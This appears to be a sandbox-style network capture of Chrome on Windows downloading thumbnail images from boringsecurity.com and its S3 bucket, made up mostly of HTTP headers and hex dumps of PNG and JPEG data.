                                                                          2023-12-10 16:45:01 UTC377INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 37 35 61 34 4b 36 2f 6e 6b 63 68 46 57 30 6f 79 55 50 45 2b 70 50 6e 4a 78 32 56 41 57 74 30 72 56 54 73 6a 4d 34 64 64 46 7a 77 7a 49 48 4f 33 77 77 44 75 69 33 41 38 58 4d 72 4d 70 66 59 57 4a 71 63 49 6b 56 75 70 75 31 55 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 32 46 4e 36 52 4e 46 31 35 53 39 47 57 34 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 32 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 32 20 53 65 70 20 32 30 32 32 20 32 33 3a 35 39 3a 35 31 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 62 32 39 30 62 65 38 66 39 34 63 62 35 36 65 65 30 65 61 38 32 30
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: 75a4K6/nkchFW0oyUPE+pPnJx2VAWt0rVTsjM4ddFzwzIHO3wwDui3A8XMrMpfYWJqcIkVupu1U=x-amz-request-id: 82FN6RNF15S9GW4KDate: Sun, 10 Dec 2023 16:45:02 GMTLast-Modified: Thu, 22 Sep 2022 23:59:51 GMTETag: "b290be8f94cb56ee0ea820
                                                                          2023-12-10 16:45:01 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec bd 75 5c 94 e9 bb 3f ce 76 d9 dd 49 89 4a 77 77 c3 00 c3 d0 8d a8 28 21 62 80 a2 28 2a 8d 08 28 dd 0d 76 77 d7 1a 6b d7 ae bb ae dd 52 d3 0c 73 5f bf d7 75 c3 20 ba bb e7 fc ce f7 7c ce 47 fd c8 1f d7 eb 79 86 99 79 86 99 fb fd bc af be 6e a9 e8 aa 8d 5f ed 01 90 5a 7d 64 fb 0f a5 f7 5f 2e 2a 7f d8 74 bd e2 51 6b 47 c5 a3 56 51 af f4 fe 06 15 ff 8b df a0 fc 61 f3 8d d2 3f 5f 2e 4e 3a b2 f7 07 c4 d8 a2 ba 6d 5f 49 ed 06 90 ca fb ed de f8 f2 47 2d 57 2a 1f b3 a1 f2 09 07 85 74 1d 7b a5 f7 37 80 ff d5 6f f0 98 0d 88 ad dc df ee 4d d8 01 20 25 b5 e6 f4 c1 1f cb 1f b5
                                                                          Data Ascii: PNGIHDRMpHYs IDATxu\?vIJww(!b(*(vwkRs_u |Gyyn_Z}d_.*tQkGVQa?_.N:m_IG-W*t{7oM %
                                                                          2023-12-10 16:45:01 UTC647INData Raw: 61 c5 5c 07 28 5a 33 9b 32 df e1 ca 38 98 ed 6e 08 67 37 25 d3 84 3f 96 33 61 09 fa bd 63 b9 e0 64 ae 06 4e 66 2a f4 bd 9b 37 2c 80 f4 18 5f b2 31 67 01 9c af 8f 23 29 e1 d6 64 9e ab 32 58 58 19 f2 b2 6f 3e e1 f6 f4 50 a9 02 c9 bf a9 00 00 20 00 49 44 41 54 93 f4 8c 0f 45 7f bc 12 1a d9 33 38 46 ba 3a 30 78 f0 e0 f6 90 ac c2 36 4c ef f5 f6 34 fc 9b 01 57 ff ba 03 92 4e 5c 16 a8 28 4f c3 dd 04 71 7f 78 e2 c2 b0 81 49 13 c7 c1 84 f1 63 40 43 5d 09 e4 64 27 11 f4 5a 27 4c 18 c7 8d 60 a9 8b 57 cd b1 86 cd 79 31 e4 f2 ce 74 82 99 82 a2 84 00 cc 69 c2 d6 f5 51 b0 78 86 1d 0d 7f 48 1c 07 f4 58 77 15 c5 c0 96 dc 85 34 a7 8a c1 db e4 05 92 24 7e 0a 9c db 9c 48 ed 39 b4 d9 4e d4 ae 80 92 c4 59 50 93 11 01 85 6b 66 53 7b f0 48 d5 0a b8 be 67 1d 84 7a 5b 81 ae aa 0c
                                                                          Data Ascii: a\(Z328ng7%?3acdNf*7,_1g#)d2XXo>P IDATE38F:0x6L4WN\(OqxIc@C]d'Z'L`Wy1tiQxHXw4$~H9NYPkfS{Hgz[
                                                                          2023-12-10 16:45:01 UTC502INData Raw: a0 21 63 16 a0 43 12 e9 65 08 ab c3 1c 60 16 53 1b 2c 75 e4 20 d4 dd 08 fc 1c 75 20 84 65 04 2b 22 dd e9 26 c3 38 bd fc d1 b9 2a b8 79 b8 80 9c dc 9c 06 bb ca e2 09 ee c5 90 9f 14 0e 5e b6 3a 44 d3 91 d5 1a 9a 55 d0 16 b6 a1 b4 2d aa bc b1 29 ba 76 07 3b 7e df 69 61 c6 c5 df 04 95 4f d8 82 5d 00 b0 b0 61 27 47 6d 9a 82 60 7e 61 95 a0 16 f7 4b fd 6f ba f6 7b 01 f7 2f 04 dc c6 56 80 79 15 9b 5b 54 a6 ca 11 3f 6f 57 0a 38 c9 38 07 dc 85 06 13 fa c8 7a d6 16 c6 74 7a b9 99 b1 6e 47 ff 01 03 d8 83 fa 7d 0f 11 2c 0d 28 5f c6 20 19 11 16 10 e5 a1 05 33 9c b4 48 80 b3 01 f1 71 d4 25 81 2e 86 e0 c7 d0 25 2c 2b 35 70 b3 54 05 77 6b 35 60 9a 2b 03 c3 78 1a 30 8c a7 02 d3 4c 11 7c ec b5 20 d4 c3 14 e6 fa 58 c2 b2 30 16 a4 c6 06 c0 ba f8 99 b8 0b 20 ec 2e 5f 49 37 a6
                                                                          Data Ascii: !cCe`S,u u e+"&8*y^:DU-)v;~iaO]a'Gm`~aKo{/Vy[T?oW88ztznG},(_ 3Hq%.%,+5pTwk5`+x0L| X0 ._I7
                                                                          2023-12-10 16:45:01 UTC8659INData Raw: 0f 59 31 37 10 bc ed cd 21 73 59 04 f9 f5 70 3d 5c df 5f 05 f3 82 dc 61 ae 97 0b c4 85 fa c3 8a 39 01 c0 b4 30 01 8d 71 52 10 63 29 45 66 59 4b 91 81 7d be 01 75 33 a3 b6 e2 7b cd 02 2c c8 ec 65 b8 7f 23 c3 cd ca 29 61 eb a8 29 12 3a cc a6 0b 70 9d 7b 6d d9 13 1c e5 8a e7 b8 41 08 7a b1 b4 40 d3 ce 12 0c 74 35 04 3f fd f8 03 17 41 37 69 f4 20 62 6f 38 55 ec 60 ac 08 ba aa b2 64 ba fc 44 dc 1d 10 ac 8c 35 88 b3 b5 3e 09 f1 b4 26 ab 16 f8 93 86 dc 25 b0 ad 68 39 39 54 9b 44 7e d9 9d 43 7e 3f 51 8a ea 91 3c bb 58 43 9e 5d ac 25 08 c2 5b 87 0b e1 c4 c6 34 a8 5b 1f 43 56 ce f3 c4 bd b7 40 61 d2 30 22 37 61 1c 59 3c c3 97 c4 cf 09 20 0b 02 3d 48 94 bf 1b 89 f2 63 a1 40 74 80 3b 61 5a 1a 91 6d 05 49 70 75 4f 05 a9 59 17 4f 1c 4d f4 c8 e2 60 2f 12 e5 e7 4a c2 fd
                                                                          Data Ascii: Y17!sYp=\_a90qRc)EfYK}u3{,e#)a):p{mAz@t5?A7i bo8U`dD5>&%h99TD~C~?Q<XC]%[4[CV@a0"7aY< =Hc@t;aZmIpuOYOM`/J


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          184192.168.2.54991452.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC388OUTGET /thumbnail_bc1_4d96972cb3.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC415INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 69 54 35 47 6e 31 55 57 48 66 42 4c 48 52 77 4e 37 52 4f 53 4d 79 37 37 54 57 49 6c 31 6f 45 7a 6d 54 51 73 2f 46 70 6c 32 67 32 66 34 61 77 2b 45 4e 68 72 47 45 67 48 79 48 59 4d 7a 51 4a 6b 6d 4d 48 41 31 39 35 35 4a 61 41 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 32 46 54 47 42 30 4d 48 32 39 33 5a 44 4e 59 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 32 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 37 20 4a 75 6c 20 32 30 32 33 20 30 32 3a 35 30 3a 35 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 39 65 64 64 32 36 34 65 38 62 32 63 30 32 61 31 63 33 32 61 66 31
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: iT5Gn1UWHfBLHRwN7ROSMy77TWIl1oEzmTQs/Fpl2g2f4aw+ENhrGEgHyHYMzQJkmMHA1955JaA=x-amz-request-id: 82FTGB0MH293ZDNYDate: Sun, 10 Dec 2023 16:45:02 GMTLast-Modified: Mon, 17 Jul 2023 02:50:53 GMTETag: "9edd264e8b2c02a1c32af1
                                                                          2023-12-10 16:45:01 UTC1542INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c d4 bd 75 74 55 e7 da ee 9d ee ba ec 7a 77 8b bb c4 dd dd dd dd 85 84 38 21 58 02 41 83 bb bb 17 68 29 52 5c 4b 95 3a b4 94 42 29 6d b1 0a 52 bc b2 f7 19 e7 bc ef 38 d7 37 ee 7b ca 7a e6 5c 73 ad 04 da f3 8e f1 fd 71 8f b9 34 a5 e4 c7 75 dd f2 3c cf b4 f9 f4 8b 2f f1 19 c5 97 27 f0 f9 97 5f e1 f3 13 5f e1 d8 57 27 71 9c e2 e4 d7 f8 e2 eb 53 f8 92 e2 d4 69 9c 38 75 1a 5f 9d fe 86 e3 e4 37 67 38 be 3e f3 2d c7 a9 6f cf 72 9c 3e fb 1d be a1 f8 ee 3b 9c f9 ee 7b 8e 6f bf ff 81 e3 ec 0f 14 e7 38 be 3b 77 9e e3 fb f3 14 17 f0 03 c5 85 8b 1c e7 2e 5e c4 f9 8b 97 70 fe d2 8f
                                                                          Data Ascii: PNGIHDRMpHYs IDATxutUzw8!XAh)R\K:B)mR87{z\sq4u</'__W'qSi8u_7g8>-or>;{o8;w.^p
                                                                          2023-12-10 16:45:01 UTC16384INData Raw: ce 5a ef 19 3a e9 35 15 34 8d c5 d2 f3 3f 65 e0 da c8 e3 da ac 54 d5 d6 88 1e b8 ef ee 11 38 23 4b 35 28 1a 7e fa 49 9e 30 c8 b0 59 01 ee 17 19 38 be 5a 52 38 02 ee 9a 3c 69 50 80 e3 c7 d6 80 bb ce 80 59 07 ce a0 52 bd a9 05 4e 84 ee 96 d2 2a 11 8b 07 d5 4a 15 e8 e4 02 c2 cc 5a b5 f9 1c b7 4b ee fe 0d f9 1c 43 26 42 67 ca e7 ac 42 67 c1 62 6d 3e fe 9c 80 b3 90 c7 59 99 38 18 03 a7 b4 46 da 03 9c b5 c6 af 36 87 63 85 53 db 21 c2 58 8b 66 a9 2a 70 f2 58 4b e9 c3 89 c0 b1 9d 2a b9 9b a9 42 b5 04 9c f4 98 ec 54 37 4b b5 d4 16 d1 03 27 5f 35 79 dc 2d 53 01 61 9c c7 c9 00 2a 90 dd be 23 41 48 57 25 77 13 a0 bb dd 56 d5 6a 94 cf 59 80 ae 3d f9 9c a6 72 b5 04 9d d2 32 51 47 5e 5a b5 93 81 3b 86 f6 e6 71 16 81 33 e8 c5 dd af c2 9d bb 47 e0 b4 0a d7 06 70 f2 94 41
                                                                          Data Ascii: Z:54?eT8#K5(~I0Y8ZR8<iPYRN*JZKC&BgBgbm>Y8F6cS!Xf*pXK*BT7K'_5y-Sa*#AHW%wVjY=r2QG^Z;q3GpA
                                                                          2023-12-10 16:45:01 UTC1024INData Raw: 0b 0e 0f c5 94 19 d3 71 fc c4 97 98 38 65 32 7a f7 ed cb 8d e0 f7 3e fc 00 e3 27 b6 e2 85 17 5f e4 62 61 ef c1 03 fc 3e 9d 0f f7 e2 4b 2f 21 3a 3a 8a 61 20 15 22 40 a8 da 24 0b a4 02 80 a1 8b 8f e5 76 08 41 97 99 9e ca 2a 97 97 9b c7 2b 80 e9 f3 92 f5 26 72 0e 48 8a 96 9a 4c b9 5f 02 03 47 e0 45 84 87 f1 6c 56 81 8e fe 3b 04 9d 8f 97 27 ab a1 12 3e 3e de 68 18 32 8c 37 c4 9c f8 fa 1b 86 ed fa cd db 68 69 19 8d 57 5e 7e 19 ef 7d 70 14 df d1 a1 8b df 7c 8b 6f c8 4e 15 4b e5 eb f7 0c de a9 33 67 58 b1 de 7e f7 3d 74 e9 da 4d 86 ee 61 09 38 52 ba 07 fe 81 87 1e 79 0c ff 78 f8 31 d4 0e 6a c4 ad 3b 77 f9 20 6e e5 c6 2a ea 1d 7d 7e 32 88 9f 4d c1 c0 e9 00 d4 c0 67 41 f5 34 55 ee 2f 97 61 f3 c6 9b 04 dc 2e 33 e0 c4 f5 71 ca 30 9f c0 d3 c2 67 ac 78 96 e0 33 56 3f
                                                                          Data Ascii: q8e2z>'_ba>K/!::a "@$vA*+&rHL_GElV;'>>h27hiW^~}p|oNK3gX~=tMa8Ryx1j;w n*}~2MgA4U/a.3q0gx3V?
                                                                          2023-12-10 16:45:01 UTC7544INData Raw: a4 04 dd df 4c 00 51 0f 9f aa 7c 06 aa a7 14 1a 3f ff 42 c0 bd c9 39 1c b5 45 c4 3e 9c b2 5c 49 03 de 41 09 3c ab ca c7 71 84 43 6d a7 18 41 68 11 44 29 28 8f 6b 9e 38 0d a1 c9 59 08 88 4b 43 58 5a 3e e2 f2 cb e1 13 99 80 f8 94 54 2c 58 bc 90 37 cf bc dc b1 03 17 0d 23 46 36 f3 08 cb 3f 28 10 81 21 c1 e8 d2 ad 2b b7 46 b6 6c df 8a b5 af ae 83 bd 83 03 1e 79 f4 11 0c 1a dc 00 3b 7b 3b 14 97 95 a0 71 48 23 02 68 10 af f6 cf 22 59 8d 44 f8 78 aa 10 17 c3 bd b7 82 82 42 64 a4 a7 a9 95 6c 46 7a 2a ea ea 6b 79 3f 04 0d fd 69 2a 41 2a 47 ab 4c 68 52 91 9d 29 81 47 ca e6 e3 ed c9 95 2a 8d c5 02 a8 55 53 53 8f 53 df 9c e5 5f 0c 59 e7 d4 e9 b3 60 6f 67 8b 84 84 04 7c 7e fc 4b ee b7 9d a2 dc 4d 85 4d 50 38 15 b4 ef d5 5c 8e 80 3b fb dd 0f 7c a5 cf 90 da d0 92 a0 f3
                                                                          Data Ascii: LQ|?B9E>\IA<qCmAhD)(k8YKCXZ>T,X7#F6?(!+Fly;{;qH#h"YDxBdlFz*ky?i*A*GLhR)G*USSS_Y`og|~KMMP8\;|
                                                                          2023-12-10 16:45:01 UTC9000INData Raw: 9d dc d8 c7 e3 f7 be cf a0 ad 3d 78 0d 73 37 1f 61 66 ff 11 46 6e ec 62 66 6d 15 df f8 de fb 98 5d 5a 80 3c 27 0f 1d 53 cb ae e2 ec e2 26 b7 ad 9a 87 67 50 d5 3e c0 47 fd 14 ba 22 c4 88 d2 b9 ad 44 13 c2 3c a4 79 c5 1b d7 c3 e3 10 9a ac 80 20 4d 8b 58 79 01 84 0a 3d 17 8f 09 42 52 c0 44 8d 05 29 f9 e5 90 1a 6b 90 51 d2 04 75 4d 2f ca 06 56 d1 38 b3 8b bc d2 5a 0e c8 bd 5e f2 e6 84 82 c6 91 ae 85 c6 20 db 64 e5 bb 0b 96 76 ef 22 bf b8 0a be e1 71 c7 b0 1d d9 11 74 a4 72 e1 42 31 c2 19 36 09 a2 12 a4 0c dd 75 6f 1f 5c b9 f2 12 fc fd 03 60 2a 2a e5 e7 d9 fd 6b 57 af 5e 43 78 44 14 72 f3 0b d0 d0 d2 85 ae 91 59 ac ee de c5 cc d2 3a 22 63 e2 40 b3 86 fe 11 f1 88 12 65 22 db 5c 89 fc 92 1a 4e 1e d2 e4 2a 64 69 f5 d0 97 56 41 96 ad c3 f2 c6 ae eb 6a f5 df fc 8e
                                                                          Data Ascii: =xs7afFnbfm]Z<'S&gP>G"D<y MXy=BRD)kQuM/V8Z^ dv"qtrB16uo\`**kW^CxDrY:"c@e"\N*diVAj
                                                                          2023-12-10 16:45:01 UTC2842INData Raw: 34 b2 4b 25 45 a6 d8 93 ca 1d 94 8d 92 5b 8d 97 66 41 5b 5c 87 dc e2 3a 18 6c 4e d8 7b a7 61 ef 9e 60 75 53 ea cb a0 32 58 d9 e8 6d 82 8d c0 53 19 ca 90 57 5c 83 c2 aa 66 1e 61 6a 1d 9a 63 00 1a 7b 27 b9 6f 4b c5 e0 c8 28 01 92 c5 69 b0 94 95 23 3e 49 84 ba a6 36 86 ad 6f da e5 56 49 a1 c8 cd 12 70 34 ea b4 b8 7d 07 2b bb f7 60 b0 94 f3 09 2f bf f0 38 56 b9 14 6d 31 74 d5 1d b0 75 4e 41 46 d7 3c c9 94 a8 6a e9 c7 d4 da 2d 2c ee 3c c0 eb df f8 2e 3e f9 f4 f3 d3 6e d4 03 b4 0f 7e f9 d1 0b db 79 e0 9d 82 cf 43 ed 3e fa 4f a8 9d 17 dd 25 4f 2e d5 44 41 3b 35 d3 ab 9c 5c ac 55 15 56 f2 e1 62 02 89 62 b6 58 51 3a cf e5 93 b1 c2 a5 64 f0 0b 18 ef 56 39 32 4e 24 32 73 b8 ac 40 3d d6 b8 94 34 ce 54 09 38 be d9 45 2c 45 86 ae 14 99 7a 2b bb 57 8a e7 f2 6d 4e 18 6b
                                                                          Data Ascii: 4K%E[fA[\:lN{a`uS2XmSW\fajc{'oK(i#>I6oVIp4}+`/8Vm1tuNAF<j-,<.>n~yC>O%O.DA;5\UVbbXQ:dV92N$2s@=4T8E,Ez+WmNk


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          185192.168.2.5499153.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC633OUTGET /thumbnail_ispeaknerd_9fc9526715.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC447INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 73 2f 38 73 46 75 63 30 69 36 30 57 74 63 36 49 6b 6a 54 4f 69 73 6a 72 46 74 47 2f 54 48 54 4a 55 32 37 44 59 47 69 70 76 36 44 6a 56 68 5a 6f 68 62 31 6f 67 31 7a 4a 37 79 61 77 34 41 7a 56 5a 37 6b 6a 6f 33 72 77 37 34 46 37 53 46 69 72 47 63 4f 74 6e 4e 33 56 4d 61 2f 70 76 4f 72 6c 4e 5a 4e 6c 55 6a 2f 32 51 37 38 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 32 46 5a 5a 4b 4d 32 56 52 39 59 58 34 42 4e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 32 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 31 20 4a 75 6e 20 32 30 32 33 20 30 31 3a 33 32 3a 30 39 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: s/8sFuc0i60Wtc6IkjTOisjrFtG/THTJU27DYGipv6DjVhZohb1og1zJ7yaw4AzVZ7kjo3rw74F7SFirGcOtnN3VMa/pvOrlNZNlUj/2Q78=x-amz-request-id: 82FZZKM2VR9YX4BNDate: Sun, 10 Dec 2023 16:45:02 GMTLast-Modified: Wed, 21 Jun 2023 01:32:09 GM
                                                                          2023-12-10 16:45:01 UTC8461INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 5d 07 7c 14 c5 1a 9f bb 4b 2f 24 a4 11 48 02 69 10 7a 42 0d bd 04 42 27 10 7a 12 d2 13 7a 13 41 f1 61 af 60 43 45 7a 93 a2 d2 9b 8a 8a 88 34 05 9f bd f3 6c 60 57 d4 a7 cf 02 d2 f2 7f bf 6f e6 66 6f 76 73 97 5c 8a 86 90 cc cf f1 c8 dd ee ec ec ce 7f bf 36 5f 61 a8 6d 65 6e 45 45 45 bc cb 7f 5f bc 78 51 fb ed e8 d1 a3 e8 d4 b1 33 18 63 60 2e 0c d1 96 b6 18 63 b9 15 93 2d ab 30 d1 b2 1c 13 2d 2b 8a f5 09 96 65 98 61 d9 80 0e 6e 43 f8 79 59 99 d9 7c ac 4b 97 2e e9 ae 75 35 34 56 d5 13 a8 6e 4d 05 c0 e5 cb 97 39 28 a8 7d ff fd f7 c8 cb cb 17 40 63 0c 1e cc 07 7d 58 21
                                                                          Data Ascii: PNGIHDRMpHYs IDATx]|K/$HizBB'zzAa`CEz4l`Wofovs\6_amenEEE_xQ3c`.c-0-+eanCyY|K.u54VnM9(}@c}X!
                                                                          2023-12-10 16:45:01 UTC8812INData Raw: d5 22 4f 5a a9 31 16 40 96 4f 97 19 c2 65 fb f2 cb 2f 31 6b e6 2c cd 0c 43 9d aa 44 2f e8 b7 4b e7 2c e0 3c e8 6c de ba 8f 0c 79 d1 06 e4 58 91 2e 82 16 52 65 af 15 d7 8c 8b 74 26 13 7a 41 ef e9 27 b4 73 ea f7 dc 73 0f bf 4f 63 cc a8 fa ec 25 95 a3 8a d4 9e 75 dc 30 a7 cb 32 0e 32 59 ee 4a 3a 52 bc 37 13 d8 97 fd 23 92 c2 d2 60 76 35 61 d4 e8 91 9c a5 d2 75 3a b3 31 98 6a 59 cb 35 56 69 8f 93 9b f8 f1 6c 10 1a 35 0e c7 d9 3f cf d9 9d 83 1d c0 e9 cd 0d 77 f7 db a9 19 66 5d 5c 5c f0 c1 07 1f 68 8b ea 08 b9 a5 35 79 2e a5 a8 a2 b1 7d dc fc b1 77 fc 37 5a 50 b1 4c 87 60 0f 74 ea c2 1d 29 3c 87 86 fe 56 41 d6 dd 03 9f 7e fa a9 6e 7c f5 21 1b cb aa f7 e8 d1 43 47 ed ae e9 f2 b0 56 d4 ce 79 d0 59 9d 27 27 91 26 77 1a 9e 2e b6 ad a8 a4 e8 31 9a 66 49 2c ab f2 6a
                                                                          Data Ascii: "OZ1@Oe/1k,CD/K,<lyX.Ret&zA'ssOc%u022YJ:R7#`v5au:1jY5Vil5?wf]\\h5y.}w7ZPL`t)<VA~n|!CGVyY''&w.1fI,j


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          186192.168.2.54992075.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC538OUTGET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC405INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 32 20 47 4d 54 0d 0a 45 74 61 67 3a 20 33 34 2d 4c 33 55 72 54 53 30
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 1Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 1195Content-Security-Policy: default-src 'none'Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:45:02 GMTEtag: 34-L3UrTS0
                                                                          2023-12-10 16:45:02 UTC781INData Raw: ff d8 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 00 30 00 30 03 01 22 00 02 11 01 03 11 01 ff c4 00 1a 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 05 06 02 03 04 01 07 ff c4 00 19 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 00 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 63 bc 44 50 fd 9e 55 c2 7a cc 87 ee 90 18 cd 63 6a a5 db 1b 18 fa 7b 06 d4 5a 16
                                                                          Data Ascii: C $.' ",#(7),01444'9=82<.342C2!!2222222222222222222222222222222222222222222222222200"cDPUzcj{Z
                                                                          2023-12-10 16:45:02 UTC414INData Raw: 33 d2 08 61 bb 1a 9b 14 2c 2d 4b 7e 81 a9 82 ef 29 30 1d b5 b3 0f aa 80 03 6a 67 98 47 ff da 00 0c 03 01 00 02 00 03 00 00 00 10 c1 f1 f0 f2 3e 88 c3 ff c4 00 18 11 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 11 10 31 ff da 00 08 01 03 01 01 3f 10 d9 75 13 10 12 09 19 ff c4 00 1e 11 01 00 01 04 02 03 00 00 00 00 00 00 00 00 00 00 01 00 10 11 21 51 31 81 41 71 f0 ff da 00 08 01 02 01 01 3f 10 a8 d8 19 7f 25 1b 51 86 4e be c6 a5 89 2c 77 ec d6 ed 18 57 99 ff c4 00 22 10 01 00 03 00 02 02 02 02 03 00 00 00 00 00 00 00 01 00 11 21 31 41 51 61 71 81 91 b1 10 a1 d1 ff da 00 08 01 01 00 01 3f 10 df f8 48 58 bd 10 17 ea 2a e6 0c 18 02 f6 c9 31 e5 af ea 76 c0 21 51 f3 7b fa 7b 85 85 97 7c 38 7f bf 72 c5 13 93 f7 e9 f4 90 6f 43 6d 41 1a cb 83 19 00 85 22
